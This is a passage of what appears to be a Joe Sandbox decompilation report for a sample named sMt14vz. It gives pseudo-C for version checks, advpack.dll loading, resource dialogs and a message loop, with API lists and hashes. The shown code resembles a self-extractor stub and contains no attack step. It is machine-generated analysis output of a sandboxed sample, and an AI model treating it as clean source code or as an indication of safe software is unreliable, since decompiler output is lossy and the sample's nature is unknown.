                                                                                                                                                                                                                                            					if(_t77 == 0) {
                                                                                                                                                                                                                                            						_t119 = 0;
                                                                                                                                                                                                                                            						__eflags = 1;
                                                                                                                                                                                                                                            						 *0x10d8184 = 1;
                                                                                                                                                                                                                                            						 *0x10d8180 = 1;
                                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                                            						 *0x10d9a40 = _t119;
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						__eflags =  *0x10d8a34 - _t138; // 0x0
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							goto L66;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t115;
                                                                                                                                                                                                                                            						if(_t115 == 0) {
                                                                                                                                                                                                                                            							goto L66;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_v428 = _t135;
                                                                                                                                                                                                                                            						__eflags = _t119;
                                                                                                                                                                                                                                            						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                                                            						_t11 =  &_v420;
                                                                                                                                                                                                                                            						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                                                            						__eflags =  *_t11;
                                                                                                                                                                                                                                            						_v440 = _t115;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_v424 = _t135 * 0x18;
                                                                                                                                                                                                                                            							_v436 = E010D2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                                                            							_t91 = E010D2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                                                            							_t123 = _v436;
                                                                                                                                                                                                                                            							_t133 = 0x54d;
                                                                                                                                                                                                                                            							__eflags = _t123;
                                                                                                                                                                                                                                            							if(_t123 < 0) {
                                                                                                                                                                                                                                            								L32:
                                                                                                                                                                                                                                            								__eflags = _v420 - 1;
                                                                                                                                                                                                                                            								if(_v420 == 1) {
                                                                                                                                                                                                                                            									_t138 = 0x54c;
                                                                                                                                                                                                                                            									L36:
                                                                                                                                                                                                                                            									__eflags = _t138;
                                                                                                                                                                                                                                            									if(_t138 != 0) {
                                                                                                                                                                                                                                            										L40:
                                                                                                                                                                                                                                            										__eflags = _t138 - _t133;
                                                                                                                                                                                                                                            										if(_t138 == _t133) {
                                                                                                                                                                                                                                            											L30:
                                                                                                                                                                                                                                            											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                                                            											_t115 = 0;
                                                                                                                                                                                                                                            											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                                                            											__eflags = _t138 - _t133;
                                                                                                                                                                                                                                            											_t133 = _v432;
                                                                                                                                                                                                                                            											if(__eflags != 0) {
                                                                                                                                                                                                                                            												_t124 = _v440;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                                                            												_v420 =  &_v268;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t124;
                                                                                                                                                                                                                                            											if(_t124 == 0) {
                                                                                                                                                                                                                                            												_t135 = _v436;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t99 = _t124[0x30];
                                                                                                                                                                                                                                            												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                                                            												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                                                            												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            													asm("sbb ebx, ebx");
                                                                                                                                                                                                                                            													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t115 = 0x104;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags =  *0x10d8a38 & 0x00000001;
                                                                                                                                                                                                                                            											if(( *0x10d8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            												L64:
                                                                                                                                                                                                                                            												_push(0);
                                                                                                                                                                                                                                            												_push(0x30);
                                                                                                                                                                                                                                            												_push(_v420);
                                                                                                                                                                                                                                            												_push(0x10d9154);
                                                                                                                                                                                                                                            												goto L65;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												__eflags = _t135;
                                                                                                                                                                                                                                            												if(_t135 == 0) {
                                                                                                                                                                                                                                            													goto L64;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												__eflags =  *_t135;
                                                                                                                                                                                                                                            												if( *_t135 == 0) {
                                                                                                                                                                                                                                            													goto L64;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												MessageBeep(0);
                                                                                                                                                                                                                                            												_t94 = E010D681F(_t115);
                                                                                                                                                                                                                                            												__eflags = _t94;
                                                                                                                                                                                                                                            												if(_t94 == 0) {
                                                                                                                                                                                                                                            													L57:
                                                                                                                                                                                                                                            													0x180030 = 0x30;
                                                                                                                                                                                                                                            													L58:
                                                                                                                                                                                                                                            													_t97 = MessageBoxA(0, _t135, 0x10d9154, 0x00180030 | _t115);
                                                                                                                                                                                                                                            													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                                                            													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                                                            														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                                                            														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            															goto L66;
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            														__eflags = _t97 - 1;
                                                                                                                                                                                                                                            														L62:
                                                                                                                                                                                                                                            														if(__eflags == 0) {
                                                                                                                                                                                                                                            															_t138 = 0;
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            														goto L66;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            													__eflags = _t97 - 6;
                                                                                                                                                                                                                                            													goto L62;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												_t98 = E010D67C9(_t124, _t124);
                                                                                                                                                                                                                                            												__eflags = _t98;
                                                                                                                                                                                                                                            												if(_t98 == 0) {
                                                                                                                                                                                                                                            													goto L57;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L58;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                                                            										if(_t138 == 0x54c) {
                                                                                                                                                                                                                                            											goto L30;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags = _t138;
                                                                                                                                                                                                                                            										if(_t138 == 0) {
                                                                                                                                                                                                                                            											goto L66;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t135 = 0;
                                                                                                                                                                                                                                            										__eflags = 0;
                                                                                                                                                                                                                                            										goto L44;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									L37:
                                                                                                                                                                                                                                            									_t129 = _v432;
                                                                                                                                                                                                                                            									__eflags = _t129[0x7c];
                                                                                                                                                                                                                                            									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                                                            										goto L66;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t133 =  &_v268;
                                                                                                                                                                                                                                            									_t104 = E010D28E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                                                            									__eflags = _t104;
                                                                                                                                                                                                                                            									if(_t104 != 0) {
                                                                                                                                                                                                                                            										goto L66;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t135 = _v428;
                                                                                                                                                                                                                                            									_t133 = 0x54d;
                                                                                                                                                                                                                                            									_t138 = 0x54d;
                                                                                                                                                                                                                                            									goto L40;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L33;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t91;
                                                                                                                                                                                                                                            							if(_t91 > 0) {
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t123;
                                                                                                                                                                                                                                            							if(_t123 != 0) {
                                                                                                                                                                                                                                            								__eflags = _t91;
                                                                                                                                                                                                                                            								if(_t91 != 0) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                                                            								L27:
                                                                                                                                                                                                                                            								if(__eflags <= 0) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								L28:
                                                                                                                                                                                                                                            								__eflags = _t135;
                                                                                                                                                                                                                                            								if(_t135 == 0) {
                                                                                                                                                                                                                                            									goto L33;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t138 = 0x54c;
                                                                                                                                                                                                                                            								goto L30;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t91;
                                                                                                                                                                                                                                            							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                                                            							if(_t91 != 0) {
                                                                                                                                                                                                                                            								_t131 = _v424;
                                                                                                                                                                                                                                            								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                                                            								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L28;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                                                            							_t109 = _v424;
                                                                                                                                                                                                                                            							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                                                            							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                                                            								goto L28;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                                                            							goto L27;
                                                                                                                                                                                                                                            							L33:
                                                                                                                                                                                                                                            							_t135 =  &(_t135[1]);
                                                                                                                                                                                                                                            							_v428 = _t135;
                                                                                                                                                                                                                                            							_v420 = _t135;
                                                                                                                                                                                                                                            							__eflags = _t135 - 2;
                                                                                                                                                                                                                                            						} while (_t135 < 2);
                                                                                                                                                                                                                                            						goto L36;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__eflags = _t77 == 1;
                                                                                                                                                                                                                                            					if(_t77 == 1) {
                                                                                                                                                                                                                                            						 *0x10d9a40 = _t119;
                                                                                                                                                                                                                                            						 *0x10d8184 = 1;
                                                                                                                                                                                                                                            						 *0x10d8180 = 1;
                                                                                                                                                                                                                                            						__eflags = _t133 - 3;
                                                                                                                                                                                                                                            						if(_t133 > 3) {
                                                                                                                                                                                                                                            							__eflags = _t133 - 5;
                                                                                                                                                                                                                                            							if(_t133 < 5) {
                                                                                                                                                                                                                                            								goto L14;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t113 = 3;
                                                                                                                                                                                                                                            							_t119 = _t113;
                                                                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t119 = 1;
                                                                                                                                                                                                                                            						_t114 = 3;
                                                                                                                                                                                                                                            						 *0x10d9a40 = 1;
                                                                                                                                                                                                                                            						__eflags = _t133 - _t114;
                                                                                                                                                                                                                                            						if(__eflags < 0) {
                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                            							 *0x10d8184 = _t135;
                                                                                                                                                                                                                                            							 *0x10d8180 = _t135;
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                                                            						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t138 = 0x4ca;
                                                                                                                                                                                                                                            					goto L44;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t138 = 0x4b4;
                                                                                                                                                                                                                                            					L44:
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					_push(0x10);
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					L65:
                                                                                                                                                                                                                                            					_t133 = _t138;
                                                                                                                                                                                                                                            					E010D44B9(0, _t138);
                                                                                                                                                                                                                                            					L66:
                                                                                                                                                                                                                                            					return E010D6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}





































                                                                                                                                                                                                                                            0x010d38b0
                                                                                                                                                                                                                                            0x010d38b2
                                                                                                                                                                                                                                            0x010d38b9
                                                                                                                                                                                                                                            0x010d38bb
                                                                                                                                                                                                                                            0x010d38c1
                                                                                                                                                                                                                                            0x010d3975
                                                                                                                                                                                                                                            0x010d38c7
                                                                                                                                                                                                                                            0x010d38de
                                                                                                                                                                                                                                            0x010d38e0
                                                                                                                                                                                                                                            0x010d38e0
                                                                                                                                                                                                                                            0x010d397b
                                                                                                                                                                                                                                            0x010d397d
                                                                                                                                                                                                                                            0x010d39a9
                                                                                                                                                                                                                                            0x010d397f
                                                                                                                                                                                                                                            0x010d3982
                                                                                                                                                                                                                                            0x010d398b
                                                                                                                                                                                                                                            0x010d398d
                                                                                                                                                                                                                                            0x010d398f
                                                                                                                                                                                                                                            0x010d399f
                                                                                                                                                                                                                                            0x010d39a1
                                                                                                                                                                                                                                            0x010d3991
                                                                                                                                                                                                                                            0x010d3991
                                                                                                                                                                                                                                            0x010d3991
                                                                                                                                                                                                                                            0x010d398f
                                                                                                                                                                                                                                            0x010d39af
                                                                                                                                                                                                                                            0x010d39b6
                                                                                                                                                                                                                                            0x010d3a0f
                                                                                                                                                                                                                                            0x010d3a0f
                                                                                                                                                                                                                                            0x010d3a11
                                                                                                                                                                                                                                            0x010d3a13
                                                                                                                                                                                                                                            0x010d3a19
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d39b8
                                                                                                                                                                                                                                            0x010d39b8
                                                                                                                                                                                                                                            0x010d39ba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d39bc
                                                                                                                                                                                                                                            0x010d39bf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d39c3
                                                                                                                                                                                                                                            0x010d39c9
                                                                                                                                                                                                                                            0x010d39ce
                                                                                                                                                                                                                                            0x010d39d0
                                                                                                                                                                                                                                            0x010d39e3
                                                                                                                                                                                                                                            0x010d39e5
                                                                                                                                                                                                                                            0x010d39e6
                                                                                                                                                                                                                                            0x010d39f1
                                                                                                                                                                                                                                            0x010d39f7
                                                                                                                                                                                                                                            0x010d39fa
                                                                                                                                                                                                                                            0x010d3a01
                                                                                                                                                                                                                                            0x010d3a04
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3a06
                                                                                                                                                                                                                                            0x010d3a09
                                                                                                                                                                                                                                            0x010d3a09
                                                                                                                                                                                                                                            0x010d3a0b
                                                                                                                                                                                                                                            0x010d3a0b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3a09
                                                                                                                                                                                                                                            0x010d39fc
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d39fc
                                                                                                                                                                                                                                            0x010d39d3
                                                                                                                                                                                                                                            0x010d39d8
                                                                                                                                                                                                                                            0x010d39da
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d39dc
                                                                                                                                                                                                                                            0x010d39b6
                                                                                                                                                                                                                                            0x010d3955
                                                                                                                                                                                                                                            0x010d395b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3961
                                                                                                                                                                                                                                            0x010d3963
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3969
                                                                                                                                                                                                                                            0x010d3969
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3969
                                                                                                                                                                                                                                            0x010d3915
                                                                                                                                                                                                                                            0x010d3915
                                                                                                                                                                                                                                            0x010d391b
                                                                                                                                                                                                                                            0x010d391f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d392d
                                                                                                                                                                                                                                            0x010d3933
                                                                                                                                                                                                                                            0x010d3938
                                                                                                                                                                                                                                            0x010d393a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3940
                                                                                                                                                                                                                                            0x010d3946
                                                                                                                                                                                                                                            0x010d394b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d394b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d38f2
                                                                                                                                                                                                                                            0x010d3843
                                                                                                                                                                                                                                            0x010d3845
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d384b
                                                                                                                                                                                                                                            0x010d384d
                                                                                                                                                                                                                                            0x010d3883
                                                                                                                                                                                                                                            0x010d3885

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 010D3723
                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 010D39C3
                                                                                                                                                                                                                                            • MessageBoxA.USER32(00000000,00000000,010D9154,00000030), ref: 010D39F1
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$BeepVersion
                                                                                                                                                                                                                                            • String ID: 3
                                                                                                                                                                                                                                            • API String ID: 2519184315-1842515611
                                                                                                                                                                                                                                            • Opcode ID: 7d61bda374b3403e834b3013feffa4585897a21bd7994b01a128361debe79526
                                                                                                                                                                                                                                            • Instruction ID: 201fcc2067f0f0b0008407c052e0a1f22606b8824576f90aa77cc903a65bc6cc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d61bda374b3403e834b3013feffa4585897a21bd7994b01a128361debe79526
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1491C3F1F013259BEBB58A29CC81BEABBB4BB45304F0540E9D9C99F245D7758980CB43
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                                                                            			E010D6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed char _t14;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t15;
                                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                                            				CHAR* _t26;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t27 = __esi;
                                                                                                                                                                                                                                            				_t18 = __ebx;
                                                                                                                                                                                                                                            				_t9 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				E010D1781( &_v268, 0x104, __ecx, 0x10d91e4);
                                                                                                                                                                                                                                            				_t26 = "advpack.dll";
                                                                                                                                                                                                                                            				E010D658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                                                            				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                                                            					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E010D6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,advpack.dll,?,010D91E4,?,00000000), ref: 010D64DF
                                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,010D91E4,?,00000000), ref: 010D64F9
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advpack.dll,?,010D91E4,?,00000000), ref: 010D6502
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                            • String ID: advpack.dll
                                                                                                                                                                                                                                            • API String ID: 438848745-3255089409
                                                                                                                                                                                                                                            • Opcode ID: c4649b320a419ba98790fa62fef9a04615e8f989990a3827c2ee8c5a1c7832fb
                                                                                                                                                                                                                                            • Instruction ID: 28ab82dc806ac34faac557ecc6fa81518b29b47e19443936c38a7d51f079da8e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c4649b320a419ba98790fa62fef9a04615e8f989990a3827c2ee8c5a1c7832fb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F01D170A00208ABDB60DB64DC48EEE7778EB60310F800199F9C5931C8DF76AAC68B50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                                            			E010D6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                                                            				struct HRSRC__* _t6;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t23;
                                                                                                                                                                                                                                            				int _t24;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t23 =  *0x10d9a3c;
                                                                                                                                                                                                                                            				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                                                            				if(_t6 == 0) {
                                                                                                                                                                                                                                            					L6:
                                                                                                                                                                                                                                            					E010D44B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					_t24 = _a16;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_a12 != 0) {
                                                                                                                                                                                                                                            							_push(_a12);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                                                            						FreeResource(_t21);
                                                                                                                                                                                                                                            						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t24;
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(?,000007D6,00000005), ref: 010D652A
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,010D2EE8,00000000,010D19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010D6538
                                                                                                                                                                                                                                            • DialogBoxIndirectParamA.USER32(?,00000000,00000547,010D19E0,00000000), ref: 010D6557
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,010D2EE8,00000000,010D19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010D6560
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1214682469-0
                                                                                                                                                                                                                                            • Opcode ID: 0ab2235986e5f279fe6477af862cc22b1593146f91b9bd11e7a1315d78895f17
                                                                                                                                                                                                                                            • Instruction ID: aed24e866c42ca637af8de384db66d35843b2eb02d502c4f3ca50b76f4d709af
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ab2235986e5f279fe6477af862cc22b1593146f91b9bd11e7a1315d78895f17
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF012672201305BBDB205EAD9C08DBB7AACEB85360F400165FE8093148DB77DD9087E0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D3680(void* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				struct tagMSG _v36;
                                                                                                                                                                                                                                            				int _t8;
                                                                                                                                                                                                                                            				struct HWND__* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v8 = __ecx;
                                                                                                                                                                                                                                            				_t16 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                                                            					if(_t8 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							if(_v36.message != 0x12) {
                                                                                                                                                                                                                                            								DispatchMessageA( &_v36);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t16 = 1;
                                                                                                                                                                                                                                            							}
